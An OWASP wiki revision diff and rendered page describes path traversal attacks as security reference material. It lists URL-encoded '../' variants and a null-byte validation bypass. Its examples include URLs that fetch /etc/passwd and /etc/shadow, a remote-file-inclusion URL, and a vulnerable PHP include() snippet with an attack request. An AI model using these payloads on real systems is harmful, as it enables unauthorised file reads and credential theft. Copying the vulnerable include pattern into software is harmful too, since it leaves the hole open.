Difference between revisions of "Path Traversal"

From OWASP
Jump to: navigation, search
(Reverting to last version not containing links to www.textc4tzellaror.com)
 
(45 intermediate revisions by 6 users not shown)
Line 1: Line 1:
 
{{Template:Attack}}
 
{{Template:Attack}}
  
 +
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''
  
==Description==
+
<br>
 +
[[Category:OWASP ASDR Project]]
  
This attack aims to access files and directories that are stored outside web root folder. By browsing the application, one should look for absolute links to files stored on the web server and how this is done. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations it’s possible to access arbitrary files and directories stored on file system, including application source code, configuration and critical system files, limited by system operational access control.
 
The idea is to use “../” sequences to move up to root directory, thus permitting to navigate thru file system.
 
  
This attack can be execute with a external malicious code injected on the path, the way of the [[Resource injection]] attack, but it’s a Path Traversal attack
 
  
This attack is also named of “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”.
+
==Overview==
 +
A Path Traversal attack aims to access files and directories that are stored outside the web root folder. By browsing the application, the attacker looks for absolute links to files stored on the web server. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration and critical system files, limited by system operational access control.
 +
The attacker uses  “../” sequences to move up to root directory, thus permitting navigation through the file system.  
  
To perform this attack it’s not necessary to use a specific tool, but it’s recommended to use a spider/crawler to detect all URLs available.
+
This attack can be executed with an external malicious code injected on the path, like the [[Resource Injection]] attack. To perform this attack it’s not necessary to use a specific tool; attackers typically use a spider/crawler to detect all URLs available.
  
 +
This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”.
  
===Request variations ===
+
==Related Security Activities==
  
'''Encoding and double encoding:'''
+
===How to Avoid Path Traversal Vulnerabilities===
 +
 
 +
See the [[:Category:OWASP Guide Project|OWASP Guide]] article on how to [[File_System#Path_traversal|Avoid Path Traversal ]] Vulnerabilities.
 +
 
 +
===How to Test for Path Traversal  Vulnerabilities===
 +
 
 +
See the [[:Category:OWASP Testing Project|OWASP Testing Guide]] article on how to [[Testing for Path Traversal  (OWASP-AZ-001)  |Test for Path Traversal ]] Vulnerabilities.
 +
 
 +
==Description==
 +
===Request variations===
 +
 
 +
Encoding and double encoding:
  
 
  %2e%2e%2f represents ../
 
  %2e%2e%2f represents ../
Line 27: Line 40:
 
  ..%255c represents ..\ and so on.  
 
  ..%255c represents ..\ and so on.  
  
'''Unicode/UTF-8 Encoding (only for systems support UTF-8 sequences)'''
+
'''Percent encoding (aka URL encoding)'''
 +
 
 +
Note that web containers perform one level of decoding on percent encoded values from forms and URLs.
  
 
  ..%c0%af represents ../  
 
  ..%c0%af represents ../  
 
  ..%c1%9c represents ..\  
 
  ..%c1%9c represents ..\  
  
 +
'''OS specific'''
  
===OS specific===
+
UNIX  
 
+
;UNIX  
+
 
  Root directory:  “ / “  
 
  Root directory:  “ / “  
 
  Directory separator: “ / “
 
  Directory separator: “ / “
  
;WINDOWS
+
WINDOWS
 
  Root directory: “  <partition letter> : \ “
 
  Root directory: “  <partition letter> : \ “
 
  Directory separator: “ / “ or “ \ ”  
 
  Directory separator: “ / “ or “ \ ”  
 +
Note that windows allows filenames to be followed by extra . \ / characters.
  
 +
In many operating systems, null bytes %00 can be injected to terminate the filename. For example, sending a parameter like:
 +
?file=secret.doc%00.pdf
 +
will result in the Java application seeing a string that ends with ".pdf" and the operating system will see a file that ends in ".doc". Attackers may use this trick to bypass validation routines.
  
==Examples ==
+
==Examples==
  
=== Example 1===
+
===Example 1===
In order to identify the possibility to execute this attack, it’s needed to observe how the application deals with the resources in use. The following examples show some situations.
+
The following examples show how the application deals with the resources in use.
 
  <nowiki> http://some_site.com.br/get-files.jsp?file=report.pdf  </nowiki>
 
  <nowiki> http://some_site.com.br/get-files.jsp?file=report.pdf  </nowiki>
 
  <nowiki> http://some_site.com.br/get-page.php?home=aaa.html  </nowiki>
 
  <nowiki> http://some_site.com.br/get-page.php?home=aaa.html  </nowiki>
 
  <nowiki> http://some_site.com.br/some-page.asp?page=index.html  </nowiki>
 
  <nowiki> http://some_site.com.br/some-page.asp?page=index.html  </nowiki>
  
 +
In these examples it’s possible to insert a malicious string as the variable parameter to access files located outside the web publish directory.
 +
  <nowiki> http://some_site.com.br/get-files?file=../../../../some dir/some file </nowiki>
  
In these examples it’s possible to insert a malicious string as the variable parameter to access files located outside the web publish directory. Ex:
 
  <nowiki> http://some_site.com.br/get-files?file=../../../../some dir/some file </nowiki>
 
Or
 
 
   <nowiki> http://some_site.com.br/../../../../some dir/some file </nowiki>
 
   <nowiki> http://some_site.com.br/../../../../some dir/some file </nowiki>
  
The following URLs show examples of *NIX password file exploitation:
+
The following URLs show examples of *NIX password file exploitation.
  
 
  <nowiki>http://some_site.com.br/../../../../etc/shadow  </nowiki>
 
  <nowiki>http://some_site.com.br/../../../../etc/shadow  </nowiki>
 
  <nowiki>http://some_site.com.br/get-files?file=/etc/passwd </nowiki>
 
  <nowiki>http://some_site.com.br/get-files?file=/etc/passwd </nowiki>
  
 
+
Note: In a windows system an attacker can navigate only in a partition that locates web root while in the Linux he can navigate in the whole disk.
 
+
Note: In a windows system an attacker can navigate only in a partition that locates web root while in the Linux he can navigate in all disc.
+
 
+
  
 
===Example 2===
 
===Example 2===
It's also possible to include files, and scripts, located on external website,
+
It's also possible to include files and scripts located on external website.
 
  <nowiki> http://some_site.com.br/some-page?page=http://other-site.com.br/other-page.htm/malicius-code.php  </nowiki>
 
  <nowiki> http://some_site.com.br/some-page?page=http://other-site.com.br/other-page.htm/malicius-code.php  </nowiki>
 
  
 
===Example 3===
 
===Example 3===
These examples illustrate a case when an attacker make the server show the CGI source code;
+
These examples illustrate a case when an attacker made the server show the CGI source code.
 
  <nowiki> http://vulnerable-page.org/cgi-bin/main.cgi?file=main.cgi  </nowiki>
 
  <nowiki> http://vulnerable-page.org/cgi-bin/main.cgi?file=main.cgi  </nowiki>
  
 
+
===Example 4===
=== Example 4===
+
 
This example was extracted from: Wikipedia - Directory Traversal  
 
This example was extracted from: Wikipedia - Directory Traversal  
  
Line 92: Line 104:
 
</nowiki></pre>
 
</nowiki></pre>
  
 
+
An attack against this system could be to send the following HTTP request:
 
+
An attack againstthis system could be to send the following HTTP request:
+
 
<pre>
 
<pre>
 
GET /vulnerable.php HTTP/1.0
 
GET /vulnerable.php HTTP/1.0
 
Cookie: TEMPLATE=../../../../../../../../../etc/passwd
 
Cookie: TEMPLATE=../../../../../../../../../etc/passwd
 
</pre>
 
</pre>
 
  
 
Generating a server response such as:
 
Generating a server response such as:
Line 111: Line 120:
 
phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh
 
phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh
 
</pre>
 
</pre>
 
  
 
The repeated <tt>../</tt> characters after /home/users/phpguru/templates/ has caused  
 
The repeated <tt>../</tt> characters after /home/users/phpguru/templates/ has caused  
 
[http://www.php.net/manual/en/function.include.php include()] to traverse to the root directory, and then include the UNIX password file [[passwd|/etc/passwd]].  
 
[http://www.php.net/manual/en/function.include.php include()] to traverse to the root directory, and then include the UNIX password file [[passwd|/etc/passwd]].  
 
  
 
UNIX etc/passwd is a common file used to demonstrate '''directory traversal''', as it is often used by crackers to try cracking the passwords.
 
UNIX etc/passwd is a common file used to demonstrate '''directory traversal''', as it is often used by crackers to try cracking the passwords.
  
 +
===Absolute Path Traversal===
  
==References==
+
The following URLs may be vulnerable to this attack:
*http://cwe.mitre.org/data/definitions/22.html
+
*http://www.webappsec.org/projects/threat/classes/path_traversal.shtml
+
*http://cve.mitre.org/docs/plover/SECTION.9.6.html#PATH.TRAV
+
  
 +
<nowiki>http://testsite.com/get.php?f=list</nowiki>
 +
<nowiki>http://testsite.com/get.cgi?f=2</nowiki>
 +
<nowiki>http://testsite.com/get.asp?f=test</nowiki>
  
==Related Threats==
+
An attacker can execute this attack  like this:
{{Template:Stub}}
+
  
[[: Category: Information Disclosure]]
+
<nowiki>http://testsite.com/get.php?f=/var/www/html/get.php</nowiki>
 +
<nowiki>http://testsite.com/get.cgi?f=/var/www/html/admin/get.inc</nowiki>
 +
<nowiki>http://testsite.com/get.asp?f=/etc/passwd</nowiki>
  
 +
When the web server returns information about errors in a web application, it is much easier for the attacker to guess the correct locations (e.g. path to the file with a source code, which then may be displayed).
  
==Related Attacks==
+
==Related [[Threat Agents]]==
*[[Path Manipulation]]
+
* [[:Category: Information Disclosure]]
*[[Relative Path Traversal]]
+
[[Category:FIXME|this link doesn't exist. Do you want to change this to a different link or add this category?]]
*[[Resource Injection]]
+
  
 +
==Related [[Attacks]]==
 +
* [[Path Manipulation]]
 +
* [[Relative Path Traversal]]
 +
* [[Resource Injection]]
  
==Related Vulnerabilities==
+
==Related [[Vulnerabilities]]==
[[:Category:Input Validation Vulnerability]]
+
* [[:Category:Input Validation Vulnerability]]
  
 +
==Related [[Controls]]==
 +
* [[:Category:Input Validation]]
 +
 +
==References==
 +
* http://cwe.mitre.org/data/definitions/22.html
 +
* http://www.webappsec.org/projects/threat/classes/path_traversal.shtml
  
==Related Countermeasures==
+
[[Category:FIXME|link not working
[[:Category:Input Validation]]
+
  
 +
* http://cve.mitre.org/docs/plover/SECTION.9.6.html#PATH.TRAV
  
==Categories==
+
]]
{{Template:Stub}}
+
  
[[:Category: Resource Manipulation]]
+
[[Category:Abuse of Functionality]]
 +
[[Category:Path Traversal Attack]]
 +
[[Category:Resource Manipulation]]
 +
[[Category:Attack]]

Latest revision as of 13:29, 27 May 2009

This is an Attack. To view all attacks, please see the Attack Category page.


Last revision (mm/dd/yy): 05/27/2009



Overview

A Path Traversal attack aims to access files and directories that are stored outside the web root folder. By browsing the application, the attacker looks for absolute links to files stored on the web server. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration and critical system files, limited by system operational access control. The attacker uses “../” sequences to move up to root directory, thus permitting navigation through the file system.

This attack can be executed with an external malicious code injected on the path, like the Resource Injection attack. To perform this attack it’s not necessary to use a specific tool; attackers typically use a spider/crawler to detect all URLs available.

This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”.

Related Security Activities

How to Avoid Path Traversal Vulnerabilities

See the OWASP Guide article on how to Avoid Path Traversal Vulnerabilities.

How to Test for Path Traversal Vulnerabilities

See the OWASP Testing Guide article on how to Test for Path Traversal Vulnerabilities.

Description

Request variations

Encoding and double encoding:

%2e%2e%2f represents ../
%2e%2e/ represents ../
..%2f represents ../ 
%2e%2e%5c represents ..\
%2e%2e\ represents ..\ 
..%5c represents ..\ 
%252e%252e%255c represents ..\ 
..%255c represents ..\ and so on. 

Percent encoding (aka URL encoding)

Note that web containers perform one level of decoding on percent encoded values from forms and URLs.

..%c0%af represents ../ 
..%c1%9c represents ..\ 

OS specific

UNIX

Root directory:  “ / “ 
Directory separator: “ / “

WINDOWS

Root directory: “  <partition letter> : \ “
Directory separator: “ / “ or “ \ ” 
Note that windows allows filenames to be followed by extra . \ / characters.

In many operating systems, null bytes %00 can be injected to terminate the filename. For example, sending a parameter like:

?file=secret.doc%00.pdf

will result in the Java application seeing a string that ends with ".pdf" and the operating system will see a file that ends in ".doc". Attackers may use this trick to bypass validation routines.

Examples

Example 1

The following examples show how the application deals with the resources in use.

 http://some_site.com.br/get-files.jsp?file=report.pdf  
 http://some_site.com.br/get-page.php?home=aaa.html  
 http://some_site.com.br/some-page.asp?page=index.html  

In these examples it’s possible to insert a malicious string as the variable parameter to access files located outside the web publish directory.

  http://some_site.com.br/get-files?file=../../../../some dir/some file 
  http://some_site.com.br/../../../../some dir/some file 

The following URLs show examples of *NIX password file exploitation.

http://some_site.com.br/../../../../etc/shadow  
http://some_site.com.br/get-files?file=/etc/passwd 

Note: In a windows system an attacker can navigate only in a partition that locates web root while in the Linux he can navigate in the whole disk.

Example 2

It's also possible to include files and scripts located on external website.

 http://some_site.com.br/some-page?page=http://other-site.com.br/other-page.htm/malicius-code.php   

Example 3

These examples illustrate a case when an attacker made the server show the CGI source code.

 http://vulnerable-page.org/cgi-bin/main.cgi?file=main.cgi   

Example 4

This example was extracted from: Wikipedia - Directory Traversal

A typical example of vulnerable application code is:

<?php
$template = 'blue.php';
if ( is_set( $_COOKIE['TEMPLATE'] ) )
   $template = $_COOKIE['TEMPLATE'];
include ( "/home/users/phpguru/templates/" . $template );
?>

An attack against this system could be to send the following HTTP request:

GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd

Generating a server response such as:

HTTP/1.0 200 OK
Content-Type: text/html
Server: Apache

root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh 
daemon:*:1:1::/tmp: 
phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh

The repeated ../ characters after /home/users/phpguru/templates/ has caused include() to traverse to the root directory, and then include the UNIX password file /etc/passwd.

UNIX etc/passwd is a common file used to demonstrate directory traversal, as it is often used by crackers to try cracking the passwords.

Absolute Path Traversal

The following URLs may be vulnerable to this attack:

http://testsite.com/get.php?f=list
http://testsite.com/get.cgi?f=2
http://testsite.com/get.asp?f=test

An attacker can execute this attack like this:

http://testsite.com/get.php?f=/var/www/html/get.php
http://testsite.com/get.cgi?f=/var/www/html/admin/get.inc
http://testsite.com/get.asp?f=/etc/passwd

When the web server returns information about errors in a web application, it is much easier for the attacker to guess the correct locations (e.g. path to the file with a source code, which then may be displayed).

Related Threat Agents

Related Attacks

Related Vulnerabilities

Related Controls

References